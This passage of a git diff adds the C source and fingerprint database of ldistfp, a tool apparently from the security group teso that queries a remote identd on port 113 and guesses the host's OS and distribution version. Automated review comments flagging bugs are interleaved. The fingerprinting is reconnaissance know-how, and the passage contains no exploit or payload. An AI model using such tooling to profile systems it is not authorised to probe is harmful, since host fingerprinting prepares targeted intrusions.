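+ for (dp = p; dp > 0; dp--) {
+ fprintf (fp, " ");
+ if (((dp % 8) == 0) && (p != 8))
+ fprintf (fp, " ");
+ fflush (fp);
+ }
+ fprintf (fp, " | ");
+ for (dp = (amount - (16 - p)); dp < amount; dp++)
+ fprintf (fp, "%c", trans[data[dp]]);
+ fflush (fp);
+ }
+ fprintf (fp, "\n");
+
+ fclose (fp);
+ return;
+}
+
+#endif
+
+
+/* z_fork
+ *
+ * fork and detach forked client completely to avoid zombies.
+ * taken from richard stevens excellent system programming book :) thanks,
+ * whereever you are now.
+ *
+ * caveat: the pid of the child has already died, it can just be used to
+ * differentiate between parent and not parent, the pid of the
+ * child is inaccessibly.
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+
+pid_t
+z_fork (void)
+{
+ pid_t pid;
+
+ pid = fork ();
+ if (pid < 0) {
+ return (pid);
+ } else if (pid == 0) {
+ /* let the child fork again
+ */
+
+ pid = fork ();
+ if (pid < 0) {
+ return (pid);
+ } else if (pid > 0) {
+ /* let the child and parent of the second child
+ * exit
+ */
+ exit (EXIT_SUCCESS);
+ }
+
+ return (0);
+ }
+
+ waitpid (pid, NULL, 0);
+
+ return (pid);
+}
+
+
+/* m_random
+ *
+ * return a random number between `lowmark' and `highmark'
+ */
+
+int
+m_random (int lowmark, int highmark)
+{
+ long int rnd;
+
+ /* flip/swap them in case user messed up
+ */
+ if (lowmark > highmark) {
+ lowmark ^= highmark;
+ highmark ^= lowmark;
+ lowmark ^= highmark;
+ }
+ rnd = lowmark;
+
+ rnd += (random () % (highmark - lowmark));
+
+ /* this is lame, i know :)
+ */
+ return (rnd);
+}
+
+
+/* set_tv
+ *
+ * initializes a struct timeval pointed to by `tv' to a second value of
+ * `seconds'
+ *
+ * return in any case
+ */
+
+void
+set_tv (struct timeval *tv, int seconds)
+{
+ tv->tv_sec = seconds;
+ tv->tv_usec = 0;
+
+ return;
+}
+
+
+/* xstrupper
+ *
+ * uppercase a string `str'
+ *
+ * return in any case
+ */
+
+void
+xstrupper (char *str)
+{
+ for (; *str != '\0'; ++str) {
+ if (*str >= 'a' && *str <= 'z') {
+ *str -= ('a' - 'A');
+ }
+ }
+
+ return;
+}
+
+
+/* concating snprintf
+ *
+ * determines the length of the string pointed to by `os', appending formatted
+ * string to a maximium length of `len'.
+ *
+ */
+
+void
+scnprintf (char *os, size_t len, const char *str, ...)
+{
+ va_list vl;
+ char *ostmp = os + strlen (os);
+
+ va_start (vl, str);
+ vsnprintf (ostmp, len - strlen (os) - 1, str, vl);
+ va_end (vl);
+
+ return;
+}
+
+unsigned long int
+tdiff (struct timeval *old, struct timeval *new)
+{
+ unsigned long int time1;
+
+ if (new->tv_sec >= old->tv_sec) {
+ time1 = new->tv_sec - old->tv_sec;
+ if ((new->tv_usec - 500000) >= old->tv_usec)
+ time1++;
+ } else {
+ time1 = old->tv_sec - new->tv_sec;
+ if ((old->tv_usec - 500000) >= new->tv_usec)
+ time1++;
+ }
+
+ return (time1);
+}
+
+
+/* ipv4_print
+ *
+ * padding = 0 -> don't padd
+ * padding = 1 -> padd with zeros
+ * padding = 2 -> padd with spaces
+ */
+
+char *
+ipv4_print (char *dest, struct in_addr in, int padding)
+{
+ unsigned char *ipp;
+
+ ipp = (unsigned char *) &in.s_addr;
+
+ strcpy (dest, "");
+
+ switch (padding) {
+ case (0):
+ sprintf (dest, "%d.%d.%d.%d",
+ ipp[0], ipp[1], ipp[2], ipp[3]);
+ break;
+ case (1):
+ sprintf (dest, "%03d.%03d.%03d.%03d",
+ ipp[0], ipp[1], ipp[2], ipp[3]);
+ break;
+ case (2):
+ sprintf (dest, "%3d.%3d.%3d.%3d",
+ ipp[0], ipp[1], ipp[2], ipp[3]);
+ break;
+ default:
+ break;
+ }
+
+ return (dest);
+}
+
+
+void *
+xrealloc (void *m_ptr, size_t newsize)
+{
+ void *n_ptr;
+
+ n_ptr = realloc (m_ptr, newsize);
+ if (n_ptr == NULL) {
+ fprintf (stderr, "realloc failed\n");
+ exit (EXIT_FAILURE);
+ }
+
+ return (n_ptr);
+}
+
+
+char *
+xstrdup (char *str)
+{
+ char *b;
+
+ b = strdup (str);
+ if (b == NULL) {
+ fprintf (stderr, "strdup failed\n");
+ exit (EXIT_FAILURE);
+ }
+
+ return (b);
+}
+
+
+void *
+xcalloc (int factor, size_t size)
+{
+ void *bla;
+
+ bla = calloc (factor, size);
+
+ if (bla == NULL) {
+ fprintf (stderr, "no memory left\n");
+ exit (EXIT_FAILURE);
+ }
+
+ return (bla);
+}
+
+/* source by dk
+ */
+
+char *
+allocncat (char **to, char *from, size_t len)
+{
+ int rlen = strlen (from);
+ int null = (*to == NULL);
+
+ len = rlen < len ? rlen : len;
+ *to = xrealloc (*to, (null ? 0 : strlen (*to)) + len + 1);
+ if (null)
+ **to = '\0';
+
+ return (strncat (*to, from, len));
+}
+
+
+char *
+alloccat (char **to, char *from)
+{
+ return (allocncat (to, from, strlen (from)));
+}
+
+
+char *
+file_load (char *pathname)
+{
+ FILE * fp;
+ char * new;
+
+ if (pathname == NULL)
+ return (NULL);
+
+ fp = fopen (pathname, "r");
+ if (fp == NULL)
+ return (NULL);
+
+ new = NULL;
+ while (feof (fp) == 0) {
+ unsigned long int rpos;
+
+ rpos = (new == NULL) ? 0 : strlen (new);
+ new = xrealloc (new, rpos + 1024);
+ memset (new + rpos, '\x00', 1024);
+ fread (new + rpos, sizeof (char), 1023, fp);
+ }
+ fclose (fp);
+ new = xrealloc (new, strlen (new) + 1);
+
+ return (new);
+}
+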
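Review bot: file_load loops on `feof (fp) == 0` and ignores what fread() returns, so a stream that fails without reaching end-of-file keeps the loop running forever; ending the loop on an empty read, `if (fread (new + rpos, sizeof (char), 1023, fp) == 0) break;`, bounds it. The append position also comes from `strlen (new)`, so data after an embedded NUL byte is overwritten by the next chunk. In scnprintf the limit `len - strlen (os) - 1` is computed in size_t and wraps to a huge value if the string is already `len` bytes or longer; checking `strlen (os) < len` before the call avoids handing vsnprintf that size. m_random divides by zero in `random () % (highmark - lowmark)` when both marks are equal, and ipv4_print writes with sprintf() into `dest` without a size, so its header comment should at least state that 16 bytes are required.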
diff --git a/other/burneye2/tmp/ldistfp/common.h b/other/burneye2/tmp/ldistfp/common.h
new file mode 100644
index 0000000..48e28e4
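--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/common.h
@@ -0,0 +1,33 @@
+
+#ifndef Z_COMMON_H
+#define Z_COMMON_H
+
+
+#include <sys/types.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <unistd.h>
+
+
+#ifdef DEBUG
+void debugp (char *filename, const char *str, ...);
+void hexdump (char *filename, unsigned char *data, unsigned int amount);
+#endif
+pid_t z_fork (void);
+int m_random (int lowmark, int highmark);
+void set_tv (struct timeval *tv, int seconds);
+void xstrupper (char *str);
+void scnprintf (char *os, size_t len,
+ const char *str, ...);
+unsigned long int tdiff (struct timeval *old, struct timeval *new);
+char * ipv4_print (char *dest, struct in_addr in,
+ int padding);
+void * xrealloc (void *m_ptr, size_t newsize);
+char * xstrdup (char *str);
+void * xcalloc (int factor, size_t size);
+char * allocncat (char **to, char *from, size_t len);
+char * alloccat (char **to, char *from);
+char * file_load (char *pathname);
+
+#endif
+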
diff --git a/other/burneye2/tmp/ldistfp/common.o b/other/burneye2/tmp/ldistfp/common.o
new file mode 100644
index 0000000..58edcb2
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/common.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/fp.txt b/other/burneye2/tmp/ldistfp/fp.txt
new file mode 100644
index 0000000..faadae6
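--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/fp.txt
@@ -0,0 +1,122 @@
+# ldistfp ident daemon replies
+# thanks to all submittors
+# some taken from identfp by f0bic (they take a lot from here, too ;)
+#
+
+# non UNIX
+"MacOS" "?" "bug46" "unknown" 0
+
+# BSDs
+"BSDI BSD/OS i386" "4.1" "Compiled: 10:02:25 Jul 30 1999" "pidentd 2.7.4" 1
+"BSDI BSD/OS i386" "4.0" "Compiled: 11:32:57 Jun 11 1998" "pidentd 2.7.4" 1
+"FreeBSD i386" "3.2-rel" "Compiled: 14:05:54 Aug 14 2000" "pidentd 2.7.4" 1
+"FreeBSD i386" "3.4-STABLE" "Compiled: 08:24:36 Sep 8 1999" "pidentd 2.8.5" 1
+"FreeBSD i386" "4.1.1-rel" "UNKNOWN-ERROR" "unknown" 0
+"FreeBSD i386" "4.2-RELEASE" "UNKNOWN-ERROR" "unknown" 0
+"FreeBSD i386" "4.2-STABLE" "Compiled: 11:18:59 Oct 23 2000" "pidentd 2.8.5" 1
+"FreeBSD i386" "4.3-RELEASE" "UNKNOWN-ERROR" "unknown" 0
+"NetBSD i386" "1.5" "Compiled: 02:02:03 Nov 17 2000" "pidentd 2.8.3" 1
+"OpenBSD" "2.7" "UNKNOWN-ERROR" "unknown" 0
+
+# more exotic UNIXs
+"AIX" "4.?" "NKNOWN-ERROR" "unknown" 0
+"Compaq Tru64" "?" "INVALID-PORT" "unknown" 0
+"Digital UNIX" "4.?" "2.5.1" "pidentd 2.5.1" 0
+"Digital UNIX" "4.?" "Compiled: 13:27:11 Sep 17 1997" "pidentd 2.8a4" 1
+"HP-UX" "10.20" "X-VERSION : identd" "unknown" 0
+"HP-UX" "10.20" "B.10.20 identd" "unknown" 1
+"HP-UX" "10.20" "UNKNOWN-ERROR" "unknown" 0
+#"HP-UX" "11.00" "2.7.4" "pidentd 2.7.4" 0
+"IRIX" "64 6.5" "Sep 15 1999 11:21:21" "pidentd 3.0.7" 1
+"OpenVMS" "?" "INVALID-PORT" "unknown" 0
+"Solaris sparc" "8" "UNKNOWN-ERROR" "unknown" 0
+"SunOS" "5.5.1" "Compiled: 14:15:17 Apr 16 1997" "pidentd 2.7.4" 1
+"SunOS" "5.6" "Compiled: 13:50:05 Mar 21 1997" "pidentd 2.7.4" 1
+"SunOS" "5.6" "Compiled: 13:07:48 Jan 16 1998" "pidentd 2.8.1" 1
+"SunOS" "5.6" "Compiled: 16:48:30 May 10 1998" "pidentd 2.8.2" 1
+"SunOS" "5.6" "Dec 18 2000 02:16:29" "pidentd 3.0.12" 1
+"SunOS" "5.7" "UNKNOWN-ERROR" "unknown" 0
+"SunOS" "5.7" "Compiled: 09:45:25 Jun 5 1998" "pidentd 2.8.2" 1
+"SunOS" "5.8" "UNKNOWN-ERROR" "unknown" 0
+"UNIX SVR4 sparc" "?" "Compiled: 22:00:50 Apr 29 1996" "pidentd 2.7a3" 1
+"UNIX SVR4 sparc" "?" "Compiled: 15:48:17 May 22 1998" "pidentd 2.8.2" 1
+
+# Linuxs/uxs/sux/
+"Accel Linux" "6.1" "Jan 9 2000 02:26:14" "3.0.7" 1
+
+"Caldera Desktop" "4.2a" "INVALID-PORT" 0
+"Caldera OpenLinux Workstation" "3.1 Beta: Sybil" "Mar 10 2001 06:21:43" "pidentd 3.0.12" 1
+
+"Debian i386" "1.3" "Compiled: 00:57:59 Mar 4 1997" "2.6.1" 1
+"Debian i386" "1.3.1" "Compiled: 01:25:17 Aug 13 1997" "2.6.1" 1
+"Debian i386" "2.0" "Compiled: 17:21:18 Jul 2 1998" "pidentd 2.6.1" 1
+"Debian i386" "2.0" "Compiled: 14:58:27 Oct 5 1998" "pidentd 2.6.1" 1
+"Debian i386" "2.1" "Compiled: 17:47:13 Feb 13 1999" "pidentd 2.6.1" 1
+"Debian i386" "2.2 official" "Apr 12 2000 16:23:18" "pidentd 3.0.7" 1
+"Debian i386" "2.2" "Nov 6 1999 10:23:17" "pidentd 3.0.7" 1
+"Debian i386" "2.2" "May 5 2000 21:58:50" "pidentd 3.0.10" 1
+"Debian i386" "2.2" "Aug 12 2000 16:50:42" "pidentd 3.0.11" 1
+"Debian i386" "2.2" "Dec 22 2000 17:00:25" "pidentd 3.0.12" 1
+"Debian i386" "woody unstab" "Mar 18 2000 19:41:58" "pidentd 3.0.7" 1
+
+"DLD" "5.41 Pro" "2.5.1" "pidentd 2.5.1" 0
+
+"Halloween" "4" "Nov 7 1999 00:18:10" "pidentd 3.0.7" 1
+
+"Mandrake" "6.0" "Compiled: 15:17:50 May 5 1999" "pidentd 2.8.5" 1
+"Mandrake" "6.1" "Compiled: 08:00:53 Jul 12 1999" "pidentd 2.8.5" 1
+"Mandrake" "7.0" "Compiled: 17:15:39 Nov 1 1999" "pidentd 2.8.5" 1
+"Mandrake" "7.1" "INVALID-PORT" "?" 0
+
+"RedHat i386" "4.0" "Compiled: 19:26:06 Sep 14 1997" "pidentd 2.7.4" 1
+"RedHat i386" "4.2" "2.5.1" "pidentd 2.5.1" 0
+"RedHat i386" "5.2" "UNKNOWN-ERROR" "unknown" 0
+"RedHat i386" "6.0 Publish" "Compiled: 22:18:25 Jan 27 1999" "pidentd 2.8.3" 1
+"RedHat i386" "6.0" "Compiled: 22:13:48 Mar 21 1999" "pidentd 2.8.5" 1
+"RedHat i386" "6.0" "Compiled: 22:13:49 Mar 21 1999" "pidentd 2.8.5" 1
+"RedHat sparc" "6.0" "Compiled: 22:13:47 Mar 21 1999" "pidentd 2.8.5" 1
+"RedHat i386" "6.1" "Sep 13 1999 20:16:57" "pidentd 3.0.7" 1
+"RedHat i386" "6.1.92" "Jan 31 2000 17:29:45" "pidentd 3.0.10" 1
+"RedHat i386" "6.2" "Feb 22 2000 16:14:21" "pidentd 3.0.10" 1
+"RedHat i386" "7.0" "Jul 20 2000 15:09:20" "pidentd 3.0.10" 1
+"RedHat i386" "7.1" "Mar 5 2001 00:27:55" "pidentd 3.0.12" 1
+
+"SlackWare" "3.4" "UNKNOWN-ERROR" "unknown" 0
+"SlackWare" "4" "Compiled: 20:08:40 May 9 1999" "pidentd 2.8.3" 1
+"SlackWare" "4" "INVALID-PORT" "unknown" 0
+"SlackWare" "7" "Compiled: 00:36:16 Oct 22 1999" "pidentd 2.8.3" 1
+"SlackWare" "7" "UNKNOWN-ERROR" "unknown" 0
+"SlackWare" "7.1" "-1073743300, 5: ERROR: INVALID PORT" "oidentd 1.6.4" 0
+
+"Stampede" "?" "INVALID-PORT" "unknown" 0
+
+"SuSE i386" "5.1" "Compiled: 08:18:26 Nov 16 1997" "pidentd 2.7.4" 1
+"SuSE i386" "5.2" "Compiled: 17:14:08 Mar 4 1998" "pidentd 2.7.4" 1
+"SuSE i386" "5.3" "Compiled: 05:40:05 Jul 30 1998" "pidentd 2.7.4" 1
+"SuSE i386" "5.3" "Compiled: 06:11:54 Aug 22 1998" "pidentd 2.7.4" 1
+"SuSE i386" "6.0" "Compiled: 13:20:35 Dec 14 1998" "pidentd 2.7.4" 1
+"SuSE i386" "6.0" "Compiled: 05:14:25 Jan 20 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.0" "Compiled: 22:11:55 Jan 25 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.1" "Compiled: 21:12:25 Apr 4 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.1" "Compiled: 06:22:26 Apr 15 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.1" "Compiled: 08:58:00 May 3 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.2 EVAL" "Compiled: 13:22:44 Jul 23 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.2" "Compiled: 22:38:10 Jul 26 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.2" "Compiled: 07:59:07 Aug 7 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.2" "Compiled: 17:09:12 Aug 22 1999" "pidentd 2.7.4" 1
+"SuSE i386" "6.3" "Nov 8 1999 20:30:25" "pidentd 3.0.7" 1
+"SuSE i386" "6.3" "Nov 13 1999 11:08:08" "pidentd 3.0.7" 1
+"SuSE i386" "6.3" "Dec 7 1999 18:52:55" "pidentd 3.0.7" 1
+"SuSE i386" "6.4" "Mar 24 2000 22:28:31" "pidentd 3.1a14" 1
+"SuSE i386" "6.4" "Mar 11 2000 10:25:44" "pidentd 3.1a14" 1
+"SuSE i386" "7.0" "Nov 19 1999 18:27:32" "pidentd 3.0.7" 1
+"SuSE i386" "7.0" "Oct 4 2000 11:18:27" "pidentd 3.1a14" 1
+"SuSE i386" "7.1" "Jan 22 2001 15:06:31" "pidentd 3.1a17" 1
+
+"TurboLinux" "4.0" "Compiled: 12:03:00 Jun 18 1999" "2.8.5" 1
+"TurboLinux" "4.2" "Compiled: 00:07:07 Aug 24 1999" "2.8.5" 1
+
+# junk
+"?" "?" "INVALID-PORT" "jidentd" 0
+"?" "?" "INVALID-PORT" "ident2" 0
+"?" "?" "INVALID-PORT" "midentd 1.x" 0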
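Review bot: The `"Caldera Desktop" "4.2a"` record (file line 47) has only three quoted fields before the trailing flag, where every other record has four, so its last string column is missing; `"Caldera Desktop" "4.2a" "INVALID-PORT" "unknown" 0` would match the neighbouring INVALID-PORT entries. The AIX record's third field `"NKNOWN-ERROR"` looks like a truncated `"UNKNOWN-ERROR"`. How either record is handled depends on the reader in ldistfp.c, which is not visible here, so both are worth checking against it.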
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-dietlibc b/other/burneye2/tmp/ldistfp/ldistfp-dietlibc
new file mode 100644
index 0000000..cb6de36
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.o b/other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.o
new file mode 100644
index 0000000..1bdaf20
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-final-glibc.o b/other/burneye2/tmp/ldistfp/ldistfp-final-glibc.o
new file mode 100644
index 0000000..49a87ad
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-glibc b/other/burneye2/tmp/ldistfp/ldistfp-glibc
new file mode 100644
index 0000000..3fb042c
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-glibc
Binary files differ
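--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp.c
@@ -0,0 +1,368 @@
+/* ldistfp - linux distribution fingerprinting
+ *
+ * by scut / teso
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "common.h"
+#include "network.h"
+
+#define AUTHORS "-sc/teso"
+#define VERSION "0.1.4"
+
+#define FP_URL "http://www.team-teso.net/data/ldistfp-auth-fingerprints"
+#define SUBMIT_URL "http://www.team-teso.net/ldistfp.php"
+
+typedef struct fingerprint {
+ char * distname;
+ char * distversion;
+ char * substring;
+ char * auth_version;
+ int exact;
+} fingerprint;
+
+fingerprint ** fp_list = NULL;
+char * fp_filename = "ldistfp-auth-fingerprints";
+char * fp_url = FP_URL;
+int fp_count = 0;
+
+int strictsure = 0;
+int machineoutput = 0;
+FILE * newfile = NULL; /* file to save new fingerprints to */
+
+
+void usage (char *prog);
+void host_print (char *host, char *bogus, fingerprint *fp);
+void fp_det (char *host, char *buf);
+void fp_list_read (char *filename);
+void fp_update (char *fname, char *url);
+
+
+void
+usage (char *prog)
+{
+ fprintf (stderr, "usage: %s [-rsmu] [-n <file>] [-U <url>] <host|ip>\n\n", prog);
+ fprintf (stderr, " -r rawmode, read from stdin in format [^ ] (buf$)\n");
+ fprintf (stderr, " -n <file> output new fingerprint information to this file\n");
+ fprintf (stderr, " -s only print host information if properly identified\n");
+ fprintf (stderr, " -m machine output\n");
+ fprintf (stderr, "\nupdate options\n");
+ fprintf (stderr, " -u update from " FP_URL "\n");
+ fprintf (stderr, " -U <url> update from given URL (http://<host>[:<port>]/<file>)\n\n");
+
+ exit (EXIT_FAILURE);
+}
+
+int
+main (int argc, char *argv[])
+{
+ int sock,
+ n;
+ int rawmode = 0;
+ int update_only = 0;
+ char c;
+ char * rbuf;
+ char * target;
+
+
+ fprintf (stderr, "ldistfp "VERSION" - remote identd fingerprinting tool. "AUTHORS"\n\n");
+
+ if (argc < 2)
+ usage (argv[0]);
+
+ while ((c = getopt (argc, argv, "rn:smf:uU:")) != EOF) {
+ switch (c) {
+ case 'r':
+ rawmode = 1;
+ break;
+ case 'n':
+ newfile = fopen (optarg, "a");
+ if (newfile == NULL) {
+ perror ("fopen");
+ exit (EXIT_FAILURE);
+ }
+ break;
+ case 's':
+ strictsure = 1;
+ break;
+ case 'm':
+ machineoutput = 1;
+ break;
+ case 'f':
+ fp_filename = optarg;
+ break;
+ case 'u':
+ update_only = 1;
+ break;
+ case 'U':
+ update_only = 1;
+ fp_url = optarg;
+ break;
+ default:
+ usage ("ldistfp");
+ break;
+ }
+ }
+
+ if (update_only == 1) {
+ fp_update (fp_filename, fp_url);
+ exit (EXIT_SUCCESS);
+ }
+
+ target = argv[argc - 1];
+ if (target[0] == '-')
+ usage ("ldistfp");
+
+ fp_list_read (fp_filename);
+ fprintf (stderr, "read %d fingerprints\n", fp_count);
+
+ if (rawmode) {
+ unsigned char tgt[200];
+ unsigned char ibuf[1024];
+
+ while (fgets (ibuf, sizeof (ibuf), stdin) != NULL) {
+ memset (tgt, '\0', sizeof (tgt));
+ sscanf (ibuf, "%199[^ :]", tgt);
+ tgt[sizeof (tgt) - 1] = '\0';
+ fp_det (tgt, ibuf);
+ }
+ } else {
+
+ sock = net_connect (NULL, target, 113, NULL, 0, 30);
+ if (sock == -1) {
+ perror ("net_connect");
+ exit (EXIT_FAILURE);
+ }
+
+ net_write (sock, "VERSION\n");
+ n = net_rlineta (sock, &rbuf, 15);
+ if (n < 0 && strictsure == 0) {
+ printf ("%s: failed to determine remote version\n", argv[1]);
+ } else {
+ fp_det (target, rbuf);
+ }
+
+ fprintf (stderr, "\n");
+ close (sock);
+ }
+
+ if (newfile != NULL)
+ fclose (newfile);
+
+
+ exit (EXIT_SUCCESS);
+}
+
+
+void
+fp_det (char *host, char *buf)
+{
+ int i;
+
+
+ for (i = 0 ; fp_list[i] != NULL ; ++i) {
+ if (strstr (buf, fp_list[i]->substring) != NULL) {
+
+ /* if it is an exact hit, then we print it and return,
+ * since there cannot be any other hit
+ */
+ if (fp_list[i]->exact != 0) {
+ host_print (host, "", fp_list[i]);
+ return;
+ } else if (strictsure == 0) {
+ host_print (host, "possible ", fp_list[i]);
+ }
+ }
+ }
+
+ if (machineoutput == 0 && newfile == NULL) {
+ printf ("\nunknown, if you know it write down the following line and submit it\n"
+ "at " SUBMIT_URL ", thanks.\n\n%s\n", buf);
+ return;
+ }
+
+ if (newfile == NULL)
+ return;
+
+ /* write new fingerprint to newfile */
+ fprintf (newfile, "%s: %s", host, buf);
+
+ return;
+}
+
+
+void
+host_print (char *host, char *bogus, fingerprint *fp)
+{
+ if (machineoutput == 1) {
+ printf ("%s/%s/%s/%s/%s\n",
+ host,
+ bogus,
+ fp->distname,
+ fp->distversion,
+ fp->auth_version);
+ } else {
+ printf ("%s: %s%s %s running %s\n",
+ host,
+ bogus,
+ fp->distname,
+ fp->distversion,
+ fp->auth_version);
+ }
+
+ return;
+}
+
+void
+fp_list_read (char *filename)
+{
+ int n,
+ fpc = 1;
+ FILE * fpl;
+ unsigned char * fpl_fg;
+
+ fpl = fopen (filename, "r");
+ if (fpl == NULL) {
+ perror ("finger print file");
+ exit (EXIT_FAILURE);
+ }
+
+ do {
+ fingerprint * new = xcalloc (1, sizeof (fingerprint));
+
+ fpc += 1;
+ fp_list = xrealloc (fp_list, fpc * sizeof (fingerprint *));
+ fp_list[fpc - 1] = NULL;
+ fp_list[fpc - 2] = new;
+
+ new->distname = xcalloc (1, 128);
+ new->distversion = xcalloc (1, 128);
+ new->substring = xcalloc (1, 128);
+ new->auth_version = xcalloc (1, 128);
+
+ /* format: "substring" "dist name" "dist version" "identd version" 0|1
+ */
+ do {
+ unsigned char buf[256];
+
+ n = 1;
+ fpl_fg = fgets (buf, sizeof (buf), fpl);
+ if (fpl_fg != NULL && strlen (buf) > 1 && buf[0] != '#') {
+ n = sscanf (buf, "\"%127[^\"]\"%*[\t ]\"%127[^\"]\"%*[\t ]"
+ "\"%127[^\"]\"%*[\t ]\"%127[^\"]\"%*[\t ]%d\n",
+ new->distname, new->distversion, new->substring,
+ new->auth_version, &new->exact);
+ }
+ } while (n != 5 && fpl_fg != NULL);
+
+ if (fpl_fg == NULL) {
+ free (new->distname);
+ free (new->distversion);
+ free (new->substring);
+ free (new->auth_version);
+ free (new);
+ fp_list[fpc - 2] = NULL;
+ } else {
+ fp_count++;
+ }
+ } while (fpl_fg != NULL);
+
+ fclose (fpl);
+}
+
+
+/* mini http/1.0 client, assume non-chunked transfer oh my.
+ * who invented chunking anyway ?
+ */
+void
+fp_update (char *fname, char *url)
+{
+ int fp_dataflag = 2;
+ int fp_updated_size = 0;
+ FILE * fp_updated;
+ char line_buf[2048];
+
+ int cs;
+ char host[128];
+ char hostfile[128];
+ unsigned short int port;
+
+
+ /* first open file, else we may not need to get the file if we can't
+ * open the file at all
+ */
+ fp_updated = fopen (fname, "w");
+ if (fp_updated == NULL) {
+ perror ("fp_update:fopen");
+ exit (EXIT_FAILURE);
+ }
+
+ memset (host, '\0', sizeof (host));
+ memset (hostfile, '\0', sizeof (hostfile));
+
+ if (sscanf (url, "http://%127[^/]%127s", host, hostfile) != 2) {
+ fprintf (stderr, "invalid URL: %s\n", url);
+ exit (EXIT_FAILURE);
+ }
+ host[sizeof (host) - 1] = '\0';
+ hostfile[sizeof (hostfile) - 1] = '\0';
+
+
+ /* find possible port suffix */
+ if (sscanf (host, "%*[^:]:%hu", &port) != 1)
+ port = 80;
+ if (strchr (host, ':') != NULL)
+ *(strchr (host, ':')) = '\0';
+
+ printf ("fetching:\n");
+ printf ("%s [%hu]: %s\n", host, port, hostfile);
+ cs = net_connect (NULL, host, port, NULL, 0, 15);
+ if (cs <= 0) {
+ perror ("fp_update:net_connect");
+ exit (EXIT_FAILURE);
+ }
+ printf ("GET [%s]\n", hostfile);
+
+ /* send request with special User-Agent (to track ldistfp versions
+ * that are used (and for possible ldistfp fingerprint file format
+ * updates, so that new format could be send for new clients, and
+ * old for old ones :-)
+ */
+ net_write (cs, "GET %s HTTP/1.1\n", hostfile);
+ net_write (cs, "User-Agent: ldistfp/"VERSION"\n");
+ net_write (cs, "Host: %s\n", host);
+ net_write (cs, "Connection: close\n");
+ net_write (cs, "\n");
+
+ do {
+ int n;
+
+ memset (line_buf, '\0', sizeof (line_buf));
+ n = net_rlinet (cs, line_buf, sizeof (line_buf), 15);
+ if (n <= 0)
+ break;
+
+ line_buf[sizeof (line_buf) - 1] = '\0';
+
+ if (fp_dataflag != 0) {
+ while (strlen (line_buf) > 0 &&
+ (line_buf[strlen (line_buf) - 1] == '\r' ||
+ line_buf[strlen (line_buf) - 1] == '\n'))
+ line_buf[strlen (line_buf) - 1] = '\0';
+ }
+
+ if (fp_dataflag == 2 && strstr (line_buf, " 200 OK") != NULL)
+ fp_dataflag = 1;
+ else if (fp_dataflag == 1 && strcmp (line_buf, "") == 0)
+ fp_dataflag = 0;
+ else if (fp_dataflag == 0 && n > 0) {
+ fp_updated_size += n;
+ fprintf (fp_updated, "%s", line_buf);
+ }
+ } while (1);
+
+ fclose (fp_updated);
+}
+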
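Review bot: In `main`, the non-raw branch passes `rbuf` to `fp_det` whenever `-s` is set, even if `net_rlineta` failed, because `if (n < 0 && strictsure == 0)` only catches the failure when `strictsure` is 0. On error `net_rlineta` (network.c in this commit) has already freed the buffer or left it NULL, so `fp_det` runs `strstr` on a dangling or null pointer, and the peer on port 113 decides whether the read fails. Test the failure on its own with `if (n < 0) {`, let `if (strictsure == 0)` guard only the `printf`, and call `free (rbuf)` after the successful `fp_det`. Separately, `fp_det` prints and appends the remote reply verbatim (`fprintf (newfile, "%s: %s", host, buf)`), so non-printable bytes should be filtered before they reach the terminal or the file, and `char c` should be `int c` for the `getopt` comparison against `EOF`.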
diff --git a/other/burneye2/tmp/ldistfp/ldistfp.o b/other/burneye2/tmp/ldistfp/ldistfp.o
new file mode 100644
index 0000000..6d9c9fb
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp.o
Binary files differ
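--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/network.c
@@ -0,0 +1,712 @@
+
+/* scut's leet network library ;)
+ * 1999 (c) scut
+ *
+ * networking routines
+ * based on my hbot networking sources,
+ * revised, extended and adapted 990405
+ * extended, improved and fixed 990430
+ *
+ * nearly all of this code wouldn't have been possible without w. richard stevens
+ * excellent network coding book. if you are interested in network coding,
+ * there is no way around it.
+ */
+
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "network.h"
+
+int net_readtimeout = NET_READTIMEOUT;
+int net_conntimeout = NET_CONNTIMEOUT;
+int net_identtimeout = NET_IDENTTIMEOUT;
+
+
+int
+net_socks_connect (char *socks, unsigned short int sport, char *server, unsigned short int port, int sec)
+{
+ int s5s;
+ struct sockaddr_in cs;
+
+ s5s = net_connect (&cs, socks, sport, NULL, 0, sec);
+ if (s5s == -1)
+ return (-1);
+
+ if (net_socks_put_s5info (s5s, server, port, sec) == -1) {
+ close (s5s);
+ return (-1);
+ }
+ return (s5s);
+}
+
+
+int
+net_socks_put_s5info (int s5s, char *server, unsigned short int port, int sec)
+{
+ int n;
+ char buff[1024];
+
+ /* v5 + noauth */
+ net_write (s5s, "\x05\x01%c", 0);
+ if (net_rtimeout (s5s, sec) == -1)
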